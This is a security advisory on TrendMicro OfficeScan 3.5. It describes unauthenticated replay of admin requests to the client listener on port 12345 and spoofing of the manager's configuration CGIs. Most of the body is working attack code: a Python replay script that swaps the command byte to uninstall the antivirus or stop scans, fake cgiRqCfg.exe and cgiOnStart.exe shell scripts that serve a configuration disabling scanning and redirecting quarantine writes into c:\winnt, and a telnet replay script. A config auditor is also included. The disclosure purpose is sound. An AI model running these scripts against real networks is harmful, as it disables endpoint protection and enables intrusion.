COMMAND
OfficeScan
SYSTEMS AFFECTED
TrendMicro OfficeScan
PROBLEM
Gregory Duchemin found the following. Most of you have certainly seen
the possibly general DoS attack against OfficeScan that consists of
connecting a client to port 12345 and never sending a TCP FIN at the
application time-out. After several tests on OfficeScan 3.5, Gregory
realized there were numerous other security flaws resulting in possible
intrusion scenarios, because of the lack of any authentication or
cryptographic protocol between the clients and the manager. OfficeScan
can potentially be used as a trojan horse: with a few preliminary
steps the result is a remote intrusion on every LAN workstation.
Systems concerned are Windows 95, 98, 2000 and NT.
A malicious user on the internal network can:
1- remotely uninstall the anti virus
2- remotely start a scan on the machine
3- remotely stop the scan
4- remotely make the anti virus ineffective by modifying the scan
configuration file over the network on the target PC
5- and finally, remotely write anywhere on the target file system!
Step 1- Replay Attack (simplest way to gain a general DoS over the LAN)
=======================================================================
The first thing the LAN attacker has to do is sniff his own PC, with
OfficeScan installed on it, and catch an admin packet toward port
12345 (the OfficeScan client listener); the same request can then be
replayed against any other client. An example of such a request
(sniffer output reassembled; the hex token is one unbroken request
line, wrapped here for readability):
GET /?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F
01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555
A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C
331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A
7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE84
4FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906 HTTP/1.0
Host: X1.X2.X3.X4:12345
User-Agent: OfficeScan/3.5
Accept: */*
The exact format of the HTTP request isn't known. It may be some kind
of signature of the admin password and other local-network specific
information, or it may not; more information on this point would be
welcome. At least the last two hex characters (one byte, 06 in our
example) encode the type of request. In further tests, some of these
codes were definitely identified:
03: used for the Alert.msg file on the remote system
04: uninstallation request
06: launch a virus scan on the PC
07: Stop the scan.
Because TmListen on the client side doesn't check for a particular
admin IP or use any other authentication protocol, the intruder can
without any problem open a connection to port 12345 and replay
requests 03, 04, 06 and 07. But if he wishes to remotely modify the
behaviour of the anti virus, he has to go to step 2.
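The replay described in step 1, as an added example that is not part of
Gregory's post or of any Trend Micro code: it pulls the opaque token out
of the captured request printed above, swaps only the trailing command
byte for one of the codes identified (03, 04, 06, 07), rebuilds the
request with the CRLF line endings the console uses, and sends it to the
client listener on port 12345. The captured request is the one shown in
the advisory with X1.X2.X3.X4 as placeholder; that the listener accepts a
token whose only change is its last byte is the advisory's observation,
not something this code verifies.

```python
import socket

# Constructed sample, copied from the request shown in the advisory: an
# opaque hex token in the query string whose last byte is the command code.
# X1.X2.X3.X4 is the advisory's placeholder for the client's address.
CAPTURED_REQUEST = (
    b"GET /?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F"
    b"01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555"
    b"A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C"
    b"331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A"
    b"7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE84"
    b"4FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906 HTTP/1.0\r\n"
    b"Host: X1.X2.X3.X4:12345\r\n"
    b"User-Agent: OfficeScan/3.5\r\n"
    b"Accept: */*\r\n"
    b"\r\n"
)

CLIENT_PORT = 12345  # TmListen, per the advisory

# Command codes the advisory identified in the trailing byte of the token.
COMMANDS = {
    0x03: "write Alert.msg on the client",
    0x04: "uninstall the anti virus",
    0x06: "start a virus scan",
    0x07: "stop the scan",
}


def extract_token(request):
    """Return the hex token from a captured 'GET /?<token> HTTP/1.0' request."""
    request_line = request.split(b"\r\n", 1)[0]
    method, target, _version = request_line.split(b" ")
    if method != b"GET" or not target.startswith(b"/?"):
        raise ValueError("not an OfficeScan console request: %r" % request_line)
    token = target[2:].decode("ascii")
    if len(token) % 2 or not all(c in "0123456789ABCDEFabcdef" for c in token):
        raise ValueError("token is not a whole number of hex bytes")
    return token


def command_code(token):
    """The request type lives in the last byte of the token."""
    return int(token[-2:], 16)


def retarget(token, code):
    """Keep the opaque prefix unchanged and swap only the command byte."""
    if code not in COMMANDS:
        raise ValueError("unknown command code %02X" % code)
    return token[:-2] + "%02X" % code


def build_request(token, host, port=CLIENT_PORT):
    """Rebuild the request as the console sends it: CRLF line ends, blank line last."""
    lines = [
        "GET /?%s HTTP/1.0" % token,
        "Host: %s:%d" % (host, port),
        "User-Agent: OfficeScan/3.5",
        "Accept: */*",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def replay(host, code, timeout=5.0):
    """Send the retargeted request to the client listener and return its answer."""
    token = retarget(extract_token(CAPTURED_REQUEST), code)
    chunks = []
    with socket.create_connection((host, CLIENT_PORT), timeout=timeout) as sock:
        sock.sendall(build_request(token, host))
        # Send our FIN right away so the connection is closed cleanly and we do
        # not trigger the separate "no FIN at time-out" hang the advisory opens with.
        sock.shutdown(socket.SHUT_WR)
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


if __name__ == "__main__":
    import sys
    target, code = sys.argv[1], int(sys.argv[2], 16)
    print("sending %02X (%s) to %s:%d" % (code, COMMANDS[code], target, CLIENT_PORT))
    print(replay(target, code))
```

Run as `python replay.py <client_ip> 06` to start a scan, or with 04 to
replay the uninstall request; the functions are kept separate so the
request bytes can be inspected without sending anything.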
Step 2- Remote manipulation (leading to host intrusions and/or general DoS)
===========================================================================
Now a little more about the OfficeScan communication protocol. It
appears that the client process communicates regularly with a number
of resident CGIs on the manager side (which has IIS installed), among
other things for file transfer purposes. When the two client services
are launched (TmListen.exe and NTRScan.exe) they request a CGI called
cgiOnStart.exe. An example of such a request (sniffit was used this
time; reassembled into one request line and wrapped for readability):
GET /officescan/cgi/cgiOnStart.exe?UID=46318530-f063-11d3-91ae-00c04f4a4c99
&DATE=20000303&TIME=142930&COMPUTER=NOM&PLATFORM=Windows%20NT%204%2e0%2e1381
&IP=Y1.Y2.Y3.Y4&PTNFILE=665&PROGRAM=3.50&ENGINE=5.100&ENCY=35&DOMAIN=Hof
&HOTFIX=&INSTDATE=20000302&INSTTIME=185210&MOBILE=0&RELEASE=3.50 HTTP/1.0
Accept: */*
User-Agent: OffficeScanNTClient
Host: X1.X2.X3.X4
Connection: Keep-Alive
When the intruder sends a type 06 request to start a remote scan, the
sniffer catches some new requests from the target toward the manager's
web port 80. Figure:

ATTACKER
    |
    |  1/ request 06
    |
    v
 [12345]                          2/ anti viral scan
 TARGET ----------------------------------------------> [80] Network Manager
        <-------------- "1" ---------  3/ GET /cgi/cgiOnStart.exe
        <----------- Cfg File --------  4/ GET /cgi/cgiRqCfg.exe
        <-----------------------------  5/ GET /cgi/cgiOnScan.exe
So when the scan starts, the client asks the manager for a
configuration file that controls many aspects of the process. The CGI
cgiRqCfg.exe returns a run-time generated configuration file for the
scan, in plain text over the network; the keywords present in that
file are then kept in the Windows registry. By spoofing the manager
and carefully setting up a web server with the same file structure
and CGI names, our intruder can forge configuration files by hand and
so remotely modify the anti virus behaviour. Figure:
ATTACKER (using the IP of the MANAGER)
    |     ^                  |
 06 |     | [80] GET         | ( Infectious Configuration File )
    |     | cgiRqCfg.exe     |
    v     |                  v
 TARGET

 MANAGER (disabled by IP spoofing)
What can we do with the configuration file? Take a look at the various
keywords:
[Scan Now Configuration]
UID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Scan Memory=0
CompressedLayer=2
ScanALLFiles=0
ExtList=.exe, .com
ScanRemoveable=0
ScanFixedDisk=0
ScanCDRom=0
VirusFoundAction=5
BkUpIfClean=0
MoveDir=MANAGER\VIRUS
CleanFailedAction=3
CleanFailedMoveDir=MANAGER\\VIRUS
Reserved=
All this data is stored under the
HKEY_LOCAL_MACHINE/Software/TrendMicro/PCCilin-NTCORP/CurrentVersion/RealTime Scan
registry key. By changing MoveDir and CleanFailedMoveDir to the value
TARGET\\anywhere, it's possible to force the remote anti virus to
write every "infected" file locally, ANYWHERE on the file system, the
Winnt directory included.
By setting "ScanRemoveable", "ScanFixedDisk" and "ScanCDRom" to zero,
it's possible to make the anti virus scan nothing at all while its
services are still alive. This is far stealthier as a way to
compromise a PC with a trojan attached to a mail. Setting ExtList to
".txt" forces the anti virus to scan only .txt files. Source examples
of fake CGIs follow.
cgiRqCfg.exe:
=============
#!/bin/sh
# Fake cgiRqCfg.exe: answers the client's configuration request with an
# attacker-chosen [Scan Now Configuration]. Drive scanning is switched
# off, ExtList no longer matches executables, and both quarantine
# directories point into the target's own c:\winnt.
echo "Content-type: text/plain"
echo
echo "[Scan Now Configuration]"
echo "UID=N0thing th4nk you"
echo "Scan Memory=0"
echo "CompressedLayer=2"
echo "ScanALLFiles=0"
echo "ExtList= YES IT's POSS1bl3 !"
echo "ScanRemoveable=0"
echo "ScanFixedDisk=0"
echo "ScanCDRom=0"
echo "VirusFoundAction=5"
echo "BkUpIfClean=0"
echo "MoveDir=c:\winnt"
echo "CleanFailedAction=3"
echo "CleanFailedMoveDir=c:\winnt"
echo "Reserved="
cgiOnStart.exe
==============
#!/bin/sh
# Fake cgiOnStart.exe: the client only needs the "1" the real CGI
# returns to carry on with the scan.
echo "Pragma: no-cache"
echo "Content-type: text/plain;charset=utf-8"
echo
echo "1"
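The configuration manipulation of step 2, as an added example that is
not part of the original post or of Trend Micro's code: it renders a
[Scan Now Configuration] file the way a fake cgiRqCfg.exe would, with
attacker-chosen keys, and audits a configuration (the text served by the
CGI, or the same keys read back from the registry) for the three
weakenings described above: no drive class scanned, executables dropped
from ExtList, and quarantine directories pointed at a local path instead
of the manager share. The benign baseline and the share name MANAGER are
constructed for the example; the UID is the one from the cgiOnStart
request above.

```python
import configparser
import re

SECTION = "Scan Now Configuration"
EXECUTABLE_EXTS = {".exe", ".com"}  # what the captured ExtList covers

# Constructed benign baseline in the format cgiRqCfg.exe serves. The UID is
# the one from the advisory's cgiOnStart request; MANAGER as the share name
# is an assumption.
BASELINE = """\
[Scan Now Configuration]
UID=46318530-f063-11d3-91ae-00c04f4a4c99
Scan Memory=1
CompressedLayer=2
ScanALLFiles=0
ExtList=.exe, .com
ScanRemoveable=1
ScanFixedDisk=1
ScanCDRom=1
VirusFoundAction=5
BkUpIfClean=0
MoveDir=MANAGER\\VIRUS
CleanFailedAction=3
CleanFailedMoveDir=MANAGER\\VIRUS
Reserved=
"""

LOCAL_DRIVE_PATH = re.compile(r"^[A-Za-z]:\\")  # c:\winnt and friends


def parse_scan_config(text):
    """Parse the INI-style text into a dict of the section's keys, in file order."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str  # keep key case as the client writes it
    parser.read_string(text)
    if not parser.has_section(SECTION):
        raise ValueError("missing [%s] section" % SECTION)
    return dict(parser.items(SECTION))


def forge_config(**overrides):
    """Render a config as a fake cgiRqCfg.exe would, overriding the chosen keys."""
    cfg = parse_scan_config(BASELINE)
    unknown = set(overrides) - set(cfg)
    if unknown:
        raise KeyError("not a Scan Now key: %s" % ", ".join(sorted(unknown)))
    cfg.update(overrides)
    return "[%s]\n" % SECTION + "".join("%s=%s\n" % kv for kv in cfg.items())


def audit_scan_config(text, manager_share="MANAGER"):
    """Return a list of findings describing how the config has been weakened."""
    cfg = parse_scan_config(text)
    findings = []

    scanned = [k for k in ("ScanRemoveable", "ScanFixedDisk", "ScanCDRom")
               if cfg.get(k, "0") == "1"]
    if not scanned:
        findings.append("no drive class is scanned "
                        "(ScanRemoveable, ScanFixedDisk and ScanCDRom are all 0)")

    # ExtList only matters when ScanALLFiles is off.
    if cfg.get("ScanALLFiles", "0") != "1":
        exts = {e.strip().lower() for e in cfg.get("ExtList", "").split(",") if e.strip()}
        missing = sorted(EXECUTABLE_EXTS - exts)
        if missing:
            findings.append("ExtList no longer covers executables: %s" % ", ".join(missing))

    # Quarantine must stay on the manager share, never on the client's own disk.
    share_prefix = manager_share.upper() + "\\"
    for key in ("MoveDir", "CleanFailedMoveDir"):
        value = cfg.get(key, "")
        if LOCAL_DRIVE_PATH.match(value) or not value.upper().startswith(share_prefix):
            findings.append("%s=%s points outside the manager quarantine share" % (key, value))

    return findings


if __name__ == "__main__":
    forged = forge_config(ScanRemoveable="0", ScanFixedDisk="0", ScanCDRom="0",
                          ExtList=".txt", MoveDir=r"c:\winnt",
                          CleanFailedMoveDir=r"c:\winnt")
    print(forged)
    for finding in audit_scan_config(forged):
        print("!", finding)
```

The audit is the defender's side of the same keys: because the client
trusts whatever cgiRqCfg.exe answers, the only place to notice the
tampering is in the values that end up on the workstation.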
The little script for the scan request (Tr3ndAtt4ck.sh
target_client_ip):
#!/bin/sh
# Tr3ndAtt4ck.sh: replay the captured admin request (type 06 = start a
# scan) against the client listener on port 12345 of the host given as
# $1. The hex token is a single unbroken string; it is wrapped here with
# backslash continuations, which sh removes inside double quotes.
TOKEN="05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F\
01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555\
A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C\
331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A\
7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE84\
4FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906"
(
sleep 2
echo "GET /?$TOKEN HTTP/1.0"
echo "Host: $1:12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept: */*"
echo
echo
sleep 5
) | telnet "$1" 12345 2>&1 | tee -a ./log.txt
SOLUTION
Patch availability:
http://www.antivirus.com/download/ofce_patch.htm